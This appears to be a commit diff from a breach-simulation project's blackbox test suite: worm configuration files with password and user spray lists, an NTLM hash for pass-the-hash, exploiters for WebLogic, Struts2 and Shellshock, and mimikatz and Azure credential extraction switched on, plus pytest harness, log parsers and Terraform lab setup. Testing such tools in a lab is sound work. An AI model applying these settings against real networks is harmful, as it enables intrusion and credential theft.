"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 60,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,184 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.18",
"10.2.2.19"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WebLogicExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,190 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Ivrrw5zEzs"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.14",
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,188 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [ "f7e457346f7743daece17258667c936d" ],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,38 @@
import os
import logging
from bson import ObjectId
LOGGER = logging.getLogger(__name__)
class MonkeyLog(object):
def __init__(self, monkey, log_dir_path):
self.monkey = monkey
self.log_dir_path = log_dir_path
def download_log(self, island_client):
log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
if not log:
LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
return False
else:
self.write_log_to_file(log)
return True
def write_log_to_file(self, log):
with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
log_file.write(MonkeyLog.parse_log(log))
@staticmethod
def parse_log(log):
log = log.strip('"')
log = log.replace("\\n", "\n ")
return log
@staticmethod
def get_filename_for_monkey_log(monkey):
return "{}.txt".format(monkey['ip_addresses'][0])
def get_log_path_for_monkey(self, monkey):
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))

View File

@ -0,0 +1,43 @@
import logging
import re
LOGGER = logging.getLogger(__name__)
class MonkeyLogParser(object):
def __init__(self, log_path):
self.log_path = log_path
self.log_contents = self.read_log()
def read_log(self):
with open(self.log_path, 'r') as log:
return log.read()
def print_errors(self):
errors = MonkeyLogParser.get_errors(self.log_contents)
if len(errors) > 0:
LOGGER.info("Found {} errors:".format(len(errors)))
for index, error_line in enumerate(errors):
LOGGER.info("Err #{}: {}".format(index, error_line))
else:
LOGGER.info("No errors!")
@staticmethod
def get_errors(log_contents):
searcher = re.compile(r"^.*:ERROR].*$", re.MULTILINE)
return searcher.findall(log_contents)
def print_warnings(self):
warnings = MonkeyLogParser.get_warnings(self.log_contents)
if len(warnings) > 0:
LOGGER.info("Found {} warnings:".format(len(warnings)))
for index, warning_line in enumerate(warnings):
LOGGER.info("Warn #{}: {}".format(index, warning_line))
else:
LOGGER.info("No warnings!")
@staticmethod
def get_warnings(log_contents):
searcher = re.compile(r"^.*:WARNING].*$", re.MULTILINE)
return searcher.findall(log_contents)

View File

@ -0,0 +1,26 @@
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log import MonkeyLog
LOGGER = logging.getLogger(__name__)
class MonkeyLogsDownloader(object):
def __init__(self, island_client, log_dir_path):
self.island_client = island_client
self.log_dir_path = log_dir_path
self.monkey_log_paths = []
def download_monkey_logs(self):
LOGGER.info("Downloading each monkey log.")
all_monkeys = self.island_client.get_all_monkeys_from_db()
for monkey in all_monkeys:
downloaded_log_path = self._download_monkey_log(monkey)
if downloaded_log_path:
self.monkey_log_paths.append(downloaded_log_path)
def _download_monkey_log(self, monkey):
log_handler = MonkeyLog(monkey, self.log_dir_path)
download_successful = log_handler.download_log(self.island_client)
return log_handler.get_log_path_for_monkey(monkey) if download_successful else None

View File

@ -0,0 +1,50 @@
import os
import shutil
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
LOG_DIR_NAME = 'logs'
LOGGER = logging.getLogger(__name__)
class TestLogsHandler(object):
def __init__(self, test_name, island_client, log_dir_path):
self.test_name = test_name
self.island_client = island_client
self.log_dir_path = os.path.join(log_dir_path, self.test_name)
def parse_test_logs(self):
log_paths = self.download_logs()
if not log_paths:
LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?")
return
TestLogsHandler.parse_logs(log_paths)
def download_logs(self):
self.try_create_log_dir_for_test()
downloader = MonkeyLogsDownloader(self.island_client, self.log_dir_path)
downloader.download_monkey_logs()
return downloader.monkey_log_paths
def try_create_log_dir_for_test(self):
try:
os.mkdir(self.log_dir_path)
except Exception as e:
LOGGER.error("Can't create a dir for test logs: {}".format(e))
@staticmethod
def delete_log_folder_contents(log_dir_path):
shutil.rmtree(log_dir_path, ignore_errors=True)
os.mkdir(log_dir_path)
@staticmethod
def parse_logs(log_paths):
for log_path in log_paths:
LOGGER.info("Info from log at {}".format(log_path))
log_parser = MonkeyLogParser(log_path)
log_parser.print_errors()
log_parser.print_warnings()

View File

@ -0,0 +1,5 @@
[pytest]
log_cli = 1
log_cli_level = INFO
log_cli_format = %(asctime)s [%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s
log_cli_date_format=%H:%M:%S

View File

@ -0,0 +1,2 @@
pytest
unittest

View File

@ -0,0 +1,110 @@
import os
import logging
import pytest
from time import sleep
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8']
LOG_DIR_PATH = "./logs"
LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
def GCPHandler(request):
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
def delete_logs():
LOGGER.info("Deleting monkey logs before new tests.")
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
def wait_machine_bootup():
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
@pytest.fixture(scope='class')
def island_client(island):
island_client_object = MonkeyIslandClient(island)
island_client_object.reset_env()
yield island_client_object
@pytest.mark.usefixtures('island_client')
# noinspection PyUnresolvedReferences
class TestMonkeyBlackbox(object):
@staticmethod
def run_basic_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
config_parser = IslandConfigParser(conf_filename)
analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(test_name,
island_client,
config_parser,
[analyzer],
timeout_in_seconds,
log_handler).run()
@staticmethod
def get_log_dir_path():
return os.path.abspath(LOG_DIR_PATH)
def test_server_online(self, island_client):
assert island_client.get_api_status() is not None
def test_ssh_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
def test_hadoop_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6*60)
def test_mssql_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
def test_smb_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_PTH.conf", "SMB_PTH")
def test_elastic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
def test_struts_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
@pytest.mark.xfail(reason="Test fails randomly - still investigating.")
def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 10*60)
def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")

View File

@ -0,0 +1,98 @@
import json
from time import sleep
import logging
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
class BasicTest(object):
def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.timeout = timeout
self.log_handler = log_handler
def run(self):
LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test:")
LOGGER.info(" ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
for analyzer in self.analyzers:
if not analyzer.analyze_test_results():
return False
return True
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed > MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when monkey is set to dead, but the process is still closing.
If we try to launch monkey during that time window monkey will fail to start, that's
why test needs to wait a bit even after all monkeys are dead.
"""
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)

View File

@ -0,0 +1,54 @@
import subprocess
import logging
LOGGER = logging.getLogger(__name__)
class GCPHandler(object):
AUTHENTICATION_COMMAND = "gcloud auth activate-service-account --key-file=%s"
SET_PROPERTY_PROJECT = "gcloud config set project %s"
MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"
def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"):
self.zone = zone
try:
# pass the key file to gcp
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True)
LOGGER.info("GCP Handler passed key")
# set project
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True)
LOGGER.info("GCP Handler set project")
LOGGER.info("GCP Handler initialized successfully")
except Exception as e:
LOGGER.error("GCP Handler failed to initialize: %s." % e)
def start_machines(self, machine_list):
"""
Start all the machines in the list.
:param machine_list: A space-separated string with all the machine names. Example:
start_machines(`" ".join(["elastic-3", "mssql-16"])`)
"""
LOGGER.info("Setting up all GCP machines...")
try:
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True)
LOGGER.info("GCP machines successfully started.")
except Exception as e:
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
def stop_machines(self, machine_list):
try:
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True)
LOGGER.info("GCP machines stopped successfully.")
except Exception as e:
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)
@staticmethod
def get_auth_command(key_path):
return GCPHandler.AUTHENTICATION_COMMAND % key_path
@staticmethod
def get_set_project_command(project):
return GCPHandler.SET_PROPERTY_PROJECT % project

View File

@ -0,0 +1,9 @@
import json
from bson import ObjectId
class MongoQueryJSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)

View File

@ -0,0 +1,17 @@
from time import time
class TestTimer(object):
def __init__(self, timeout):
self.timeout_time = TestTimer.get_timeout_time(timeout)
self.start_time = time()
def is_timed_out(self):
return time() > self.timeout_time
def get_time_taken(self):
return time() - self.start_time
@staticmethod
def get_timeout_time(timeout):
return time() + timeout

File diff suppressed because it is too large Load Diff

Binary file not shown.

After

Width:  |  Height:  |  Size: 225 KiB

4
envs/monkey_zoo/gcp_keys/.gitignore vendored Normal file
View File

@ -0,0 +1,4 @@
# Ignore everything in this directory
*
# Except this file
!.gitignore

View File

@ -0,0 +1,11 @@
provider "google" {
project = "test-000000"
region = "europe-west3"
zone = "europe-west3-b"
credentials = "${file("../gcp_keys/gcp_key.json")}"
}
locals {
resource_prefix = ""
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com"
monkeyzoo_project="guardicore-22050661"
}

View File

@ -0,0 +1,100 @@
resource "google_compute_firewall" "islands-in" {
name = "${local.resource_prefix}islands-in"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "tcp"
ports = ["22", "443", "3389", "5000"]
}
direction = "INGRESS"
priority = "65534"
target_tags = ["island"]
}
resource "google_compute_firewall" "islands-out" {
name = "${local.resource_prefix}islands-out"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "tcp"
}
direction = "EGRESS"
priority = "65534"
target_tags = ["island"]
}
resource "google_compute_firewall" "monkeyzoo-in" {
name = "${local.resource_prefix}monkeyzoo-in"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
priority = "65534"
source_ranges = ["10.2.2.0/24"]
}
resource "google_compute_firewall" "monkeyzoo-out" {
name = "${local.resource_prefix}monkeyzoo-out"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
priority = "65534"
destination_ranges = ["10.2.2.0/24"]
}
resource "google_compute_firewall" "tunneling-in" {
name = "${local.resource_prefix}tunneling-in"
network = "${google_compute_network.tunneling.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
source_ranges = ["10.2.1.0/24"]
}
resource "google_compute_firewall" "tunneling-out" {
name = "${local.resource_prefix}tunneling-out"
network = "${google_compute_network.tunneling.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
destination_ranges = ["10.2.1.0/24"]
}
resource "google_compute_firewall" "tunneling2-in" {
name = "${local.resource_prefix}tunneling2-in"
network = "${google_compute_network.tunneling2.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
source_ranges = ["10.2.0.0/24"]
}
resource "google_compute_firewall" "tunneling2-out" {
name = "${local.resource_prefix}tunneling2-out"
network = "${google_compute_network.tunneling2.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
destination_ranges = ["10.2.0.0/24"]
}

View File

@ -0,0 +1,95 @@
//Custom cloud images
data "google_compute_image" "hadoop-2" {
name = "hadoop-2"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "hadoop-3" {
name = "hadoop-3"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "elastic-4" {
name = "elastic-4"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "elastic-5" {
name = "elastic-5"
project = "${local.monkeyzoo_project}"
}
/*
data "google_compute_image" "sambacry-6" {
name = "sambacry-6"
}
*/
data "google_compute_image" "shellshock-8" {
name = "shellshock-8"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-9" {
name = "tunneling-9"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-10" {
name = "tunneling-10"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-11" {
name = "tunneling-11"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "sshkeys-11" {
name = "sshkeys-11"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "sshkeys-12" {
name = "sshkeys-12"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mimikatz-14" {
name = "mimikatz-14"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mimikatz-15" {
name = "mimikatz-15"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mssql-16" {
name = "mssql-16"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "weblogic-18" {
name = "weblogic-18"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "weblogic-19" {
name = "weblogic-19"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "smb-20" {
name = "smb-20"
